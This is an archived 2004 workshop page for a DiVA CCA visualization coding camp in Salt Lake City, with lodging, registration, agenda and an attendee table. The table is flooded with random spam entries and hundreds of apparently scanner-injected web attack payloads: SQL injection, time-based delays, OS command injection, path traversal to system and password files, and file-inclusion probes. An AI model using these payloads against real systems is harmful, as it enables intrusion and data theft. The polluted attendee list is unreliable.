July 2004 DiVA CCA Coding Camp

Table of Contents

Dates

Location – Lodging

The meeting hotel is The Hotel Monaco – Salt Lake City. A block of rooms has been reserved under the name "Diva." As of the time of this writing, I don't know what the exact room rate is.

If you're extremely averse to spending any money whatsoever, contact Steve Parker sparker at cs dot utah dot edu for information about other cheap-o places to stay. One alternative is the University's guest house. Another is a tent in Steve's backyard.


Registration

Please visit this page to register for the July coding camp. No registration fee is required – we just need to get a head count.


Background and Workshop Objectives

Building upon previous workshops, the overall objectives for this meeting are to (1) gain direct experience with CCA as a component and framework infrastructure; (2) see what we can do with CCA in terms of building some visualization components and assembling them into a pipeline. Our meeting will be held in the days immediately preceding the July 2004 meeting of the CCA itself. You should feel free to stay for the regular CCA meeting if you are so inclined. For more information about the CCA and their July meeting, visit the CCA website.

The objectives for the organizational meeting are as follows:

Note: The organizational meeting is intended to be a relatively small and informal affair. Please contact Wes if you want to attend the organizational meeting.

The objective for the coding camp is to go through the process of writing some CCA-based visualization components. In an ideal world, when we finish, we will have a handful of visualization components that can be run from one or more of the existing CCA frameworks.


Pre-Workshop Homework


Agenda


Monday July 26, 2004
18:00 - 21:00 — Organizational meeting, location TBD.

Tuesday July 27, 2004
09:00 - 18:00 — Write code. (We'll refine this schedule a bit
as we get closer to the date.)

Wednesday July 28, 2004
09:00 - 16:00 — Write code.
16:00 - 18:00 — Discussion and close of coding camp.

Attendees

Name Affiliation Email
Wes Bethel LNBL ewbethel at lbl dot gov
James Arthur "Jeeembo" Kohl Oak Ridge National Laboratory kohlja at ornl dot gov
Dave Pugmire LANL pugmire@lanl.gov
mvsizwhy hqwJUTbI cftagt@rgysys.com
uqbwiaooqk FIAApmhhar pdidbn@hhtaud.com
abnhnwytqzx xBXThiqnowZ epludk@apvdip.com
hmjhdb ZpAfLebnvhWb yzduhw@ajzxsy.com
ukagzbrpdw NUwGcHKBGfMkx fyozmz@vpmlfa.com
vzpqfshtgu lVFbAviibievuSDSrC ljtvpt@xiyzni.com
sljnamiog tNwcFZzUCahRMXgPXO mhvjkw@ixmlkq.com
epohrxnfskz KzdvbarvSc qeigmt@szlhmq.com
opgvrnkb ADZzPYqJBwtJytRDtG jtxksy@ewqsti.com
fctvehxti rskBuZNRPnkUGxWG fcwumf@sryeef.com
hcnanzu OoPluwmeBzfveSNGG beopyz@tnkyuq.com
%27 3 netsparker@example.com
-1 OR 1=1 3 netsparker@example.com
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) 3 netsparker@example.com
-1 OR 1=1 3 netsparker@example.com
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' 3 netsparker@example.com
' 3 netsparker@example.com
NS1NO 3 netsparker@example.com
convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) 3 netsparker@example.com
1 AND 'NS='ss 3 netsparker@example.com
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +' 3 netsparker@example.com
'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+' 3 netsparker@example.com
' OR 'ns'='ns 3 netsparker@example.com
';WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
-1 OR 17-7=10 3 netsparker@example.com
-1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) 3 netsparker@example.com
1;WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
1 OR X='ss 3 netsparker@example.com
-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' 3 netsparker@example.com
' OR '1'='1 3 netsparker@example.com
WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
-1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+" 3 netsparker@example.com
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) 3 netsparker@example.com
1);WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
' OR '1'='1 3 netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
');WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) 3 netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
'));WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' 3 netsparker@example.com
Smith ' netsparker@example.com
1));WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) 3 netsparker@example.com
Smith NS1NO netsparker@example.com
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
NSFTW 3 netsparker@example.com
Smith 1 AND 'NS='ss netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
'+NSFTW+' 3 netsparker@example.com
Smith ' OR 'ns'='ns netsparker@example.com
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) 3 netsparker@example.com
Smith -1 OR 17-7=10 netsparker@example.com
'"--> 3 netsparker@example.com
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
Smith 1 OR X='ss netsparker@example.com
-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' 3 netsparker@example.com
-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 3 netsparker@example.com
Smith ' OR '1'='1 netsparker@example.com
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 3 netsparker@example.com
(select sleep(25))a-- 1 3 netsparker@example.com
Smith ' OR '1'='1 netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) 3 netsparker@example.com
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) 3 netsparker@example.com
Smith 3 -1 OR 1=1
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' 3 netsparker@example.com
Smith 3 -1 OR 1=1
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' 3 netsparker@example.com
Smith %27 netsparker@example.com
Smith 3 '
';SELECT pg_sleep(25)-- 3 netsparker@example.com
1;SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 NS1NO
Smith (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) netsparker@example.com
SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' netsparker@example.com
Smith 3 1 AND 'NS='ss
1);SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 ' OR 'ns'='ns
Smith convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) netsparker@example.com
Smith 3 -1 OR 17-7=10
');SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +' netsparker@example.com
Smith 3 1 OR X='ss
'));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+' netsparker@example.com
Smith 3 ' OR '1'='1
1));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith -1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) netsparker@example.com
Smith 3 ' OR '1'='1
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 3 netsparker@example.com
Smith -1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' netsparker@example.com
"& SET /A 0xFFF9999-2 & 3 netsparker@example.com
(SELECT 1 FROM (SELECT SLEEP(25))A) 3 netsparker@example.com
Smith -1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+" netsparker@example.com
'& SET /A 0xFFF9999-2 & 3 netsparker@example.com
'+(SELECT 1 FROM (SELECT SLEEP(25))A)+' 3 netsparker@example.com
"& ping -n 26 127.0.0.1 & 3 netsparker@example.com
Smith (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) netsparker@example.com
& SET /A 0xFFF9999-2 & 3 netsparker@example.com
-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' 3 netsparker@example.com
'& ping -n 26 127.0.0.1 & 3 netsparker@example.com
Smith cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) netsparker@example.com
-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) 3 netsparker@example.com
SET /A 0xFFF9999-2 & 3 netsparker@example.com
& ping -n 26 127.0.0.1 & 3 netsparker@example.com
Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' netsparker@example.com
-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" 3 netsparker@example.com
"&expr 268409241 - 2 &" 3 netsparker@example.com
ping -n 26 127.0.0.1 & 3 netsparker@example.com
Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) netsparker@example.com
Smith ';WAITFOR DELAY '0:0:25'-- netsparker@example.com
'&expr 268409241 - 2 &' 3 netsparker@example.com
"&ping -c 26 127.0.0.1 &" 3 netsparker@example.com
Smith NSFTW netsparker@example.com
Smith 1;WAITFOR DELAY '0:0:25'-- netsparker@example.com
'&ping -c 26 127.0.0.1 &' 3 netsparker@example.com
&expr 268409241 - 2 & 3 netsparker@example.com
Smith '+NSFTW+' netsparker@example.com
Smith WAITFOR DELAY '0:0:25'-- netsparker@example.com
expr 268409241 - 2 & 3 netsparker@example.com
&ping -c 26 127.0.0.1 & 3 netsparker@example.com
Smith (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) netsparker@example.com
Smith 1);WAITFOR DELAY '0:0:25'-- netsparker@example.com
SET /A 0xFFF9999-2 3 netsparker@example.com
ping -c 26 127.0.0.1 & 3 netsparker@example.com
Smith -1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' netsparker@example.com
Smith ');WAITFOR DELAY '0:0:25'-- netsparker@example.com
expr 268409241 - 2 3 netsparker@example.com
ping -n 26 127.0.0.1 3 netsparker@example.com
Smith -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 netsparker@example.com
Smith '));WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith "& SET /A 0xFFF9999-2 & netsparker@example.com
ping -c 26 127.0.0.1 3 netsparker@example.com
Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) netsparker@example.com
Smith 1));WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith "& ping -n 26 127.0.0.1 & netsparker@example.com
Smith '& SET /A 0xFFF9999-2 & netsparker@example.com
Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' netsparker@example.com
Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith & SET /A 0xFFF9999-2 & netsparker@example.com
Smith '& ping -n 26 127.0.0.1 & netsparker@example.com
Smith 3 %27
Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith & ping -n 26 127.0.0.1 & netsparker@example.com
Smith SET /A 0xFFF9999-2 & netsparker@example.com
Smith 3 (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith ping -n 26 127.0.0.1 & netsparker@example.com
Smith "&expr 268409241 - 2 &" netsparker@example.com
Smith 3 '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith "&ping -c 26 127.0.0.1 &" netsparker@example.com
Smith '&expr 268409241 - 2 &' netsparker@example.com
Smith 3 convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
Smith -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 netsparker@example.com
Smith '&ping -c 26 127.0.0.1 &' netsparker@example.com
Smith &expr 268409241 - 2 & netsparker@example.com
Smith 3 '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
Smith (select sleep(25))a-- 1 netsparker@example.com
Smith &ping -c 26 127.0.0.1 & netsparker@example.com
Smith 3 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
Smith expr 268409241 - 2 & netsparker@example.com
Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) netsparker@example.com
Smith ping -c 26 127.0.0.1 & netsparker@example.com
Smith 3 -1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Smith SET /A 0xFFF9999-2 netsparker@example.com
Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' netsparker@example.com
Smith ping -n 26 127.0.0.1 netsparker@example.com
Smith expr 268409241 - 2 netsparker@example.com
Smith 3 -1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
Smith ';SELECT pg_sleep(25)-- netsparker@example.com
Smith ping -c 26 127.0.0.1 netsparker@example.com
Smith 3 "& SET /A 0xFFF9999-2 &
Smith 3 -1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"
Smith 1;SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 "& ping -n 26 127.0.0.1 &
Smith 3 '& SET /A 0xFFF9999-2 &
Smith 3 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
Smith SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 '& ping -n 26 127.0.0.1 &
Smith 3 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
Smith 3 & SET /A 0xFFF9999-2 &
Smith 1);SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 & ping -n 26 127.0.0.1 &
Smith 3 SET /A 0xFFF9999-2 &
Smith 3 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
Smith ');SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 ping -n 26 127.0.0.1 &
Smith '"--> netsparker@example.com
Smith 3 "&expr 268409241 - 2 &"
Smith '));SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
Smith 3 "&ping -c 26 127.0.0.1 &"
Smith 3 '&expr 268409241 - 2 &'
Smith 3 NSFTW
Smith 1));SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 '&ping -c 26 127.0.0.1 &'
Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 netsparker@example.com
Smith 3 '+NSFTW+'
Smith 3 &expr 268409241 - 2 &
Smith 3 &ping -c 26 127.0.0.1 &
Smith 3 (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Smith (SELECT 1 FROM (SELECT SLEEP(25))A) netsparker@example.com
Smith 3 ping -c 26 127.0.0.1 &
Smith 3 expr 268409241 - 2 &
Smith '+(SELECT 1 FROM (SELECT SLEEP(25))A)+' netsparker@example.com
Smith 3 -1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
Smith 3 ping -n 26 127.0.0.1
Smith 3 SET /A 0xFFF9999-2
Smith -1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' netsparker@example.com
Smith 3 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
Smith 3 ping -c 26 127.0.0.1
Smith 3 expr 268409241 - 2
Smith 3 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith -1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) netsparker@example.com
../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith 3 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith -1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" netsparker@example.com
hTTp://netsparker.com/n 3 netsparker@example.com
http://netsparker.com/n?.cgi 3 netsparker@example.com
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini 3 netsparker@example.com
Smith 3 ';WAITFOR DELAY '0:0:25'--
Smith 3 netsparker@example.com
http://netsparker.com/n?.cgi 3 netsparker@example.com
Smith 3 1;WAITFOR DELAY '0:0:25'--
Smith 3 netsparker@example.com
../../../../../../../../../../boot.ini.cgi 3 netsparker@example.com
Smith 3 WAITFOR DELAY '0:0:25'--
php://filter//resource=http://netsparker.com/n?.cgi 3 netsparker@example.com
Smith 3 netsparker@example.com
/../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith 3 1);WAITFOR DELAY '0:0:25'--
netsparker.com/n 3 netsparker@example.com
file:/windows/win.ini 3 netsparker@example.com
Smith 3 ');WAITFOR DELAY '0:0:25'--
response.write(268409241-22)' 3 netsparker@example.com
Smith hTTp://netsparker.com/n netsparker@example.com
../../../../../../../../../../windows/win.ini 3 netsparker@example.com
Smith 3 '));WAITFOR DELAY '0:0:25'--
+response.write(268409241-22)' 3 netsparker@example.com
Smith http://netsparker.com/n?.cgi netsparker@example.com
../../../../../../../../../../windows/win.ini.cgi 3 netsparker@example.com
Smith 3 1));WAITFOR DELAY '0:0:25'--
"+response.write(268409241-22)+" 3 netsparker@example.com
Smith http://netsparker.com/n?.cgi netsparker@example.com
Smith 3 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
c:\windows\win.ini 3 netsparker@example.com
<% response.write(268409241-22) %> 3 netsparker@example.com
Smith php://filter//resource=http://netsparker.com/n?.cgi netsparker@example.com
Smith 3 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
../../../../../../../../../../windows/iis6.log 3 netsparker@example.com
print(int)0xFFF9999-22 3 netsparker@example.com
Smith netsparker.com/n netsparker@example.com
Smith 3 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
../../../../../../../../../../proc/self/fd/2 3 netsparker@example.com
+print(int)0xFFF9999-22;// 3 netsparker@example.com
Smith 3 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith 3 hTTp://netsparker.com/n
../../../../../../../../../../proc/self/fd/2.cgi 3 netsparker@example.com
'+print(int)0xFFF9999-22+' 3 netsparker@example.com
Smith 3 -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1
../../../../../../../../../../etc/httpd/logs/error.log 3 netsparker@example.com
Smith 3 http://netsparker.com/n?.cgi
"+print(int)0xFFF9999-22+" 3 netsparker@example.com
Smith 3 (select sleep(25))a-- 1
../../../../../../../../../../etc/httpd/logs/error_log 3 netsparker@example.com
Smith 3 http://netsparker.com/n?.cgi
3 netsparker@example.com
Smith 3 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
../../../../../../../../../../var/log/apache2/error.log 3 netsparker@example.com
Smith 3 php://filter//resource=http://netsparker.com/n?.cgi
Smith 3 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
{php}print(int)0xFFF9999-22;{/php} 3 netsparker@example.com
../../../../../../../../../../var/log/apache/error.log 3 netsparker@example.com
Smith 3 netsparker.com/n
Smith 3 ';SELECT pg_sleep(25)--
'{${print(int)0xFFF9999-22}}' 3 netsparker@example.com
Smith 3 netsparker@example.com
../../../../../../../../../../proc/self/version 3 netsparker@example.com
Smith 3 1;SELECT pg_sleep(25)--
[php]print(int)0xFFF9999-22;[/php] 3 netsparker@example.com
../../../../../../../../../../proc/self/version.cgi 3 netsparker@example.com
Smith 3 netsparker@example.com
Smith 3 SELECT pg_sleep(25)--
print 0xFFF9999-22 3 netsparker@example.com
../../../../../../../../../../../etc/passwd 3 netsparker@example.com
Smith 3 1);SELECT pg_sleep(25)--
ns:netsparker056650=vuln 3 netsparker@example.com
eval('print 0xFFF9999-22') 3 netsparker@example.com
Smith 3 ');SELECT pg_sleep(25)--
http://example.com/? ns: netsparker056650=vuln 3 netsparker@example.com
../../../../../../../../../../../etc/passwd 3 netsparker@example.com
'+print 0xFFF9999-22+' 3 netsparker@example.com
Smith 3 '));SELECT pg_sleep(25)--
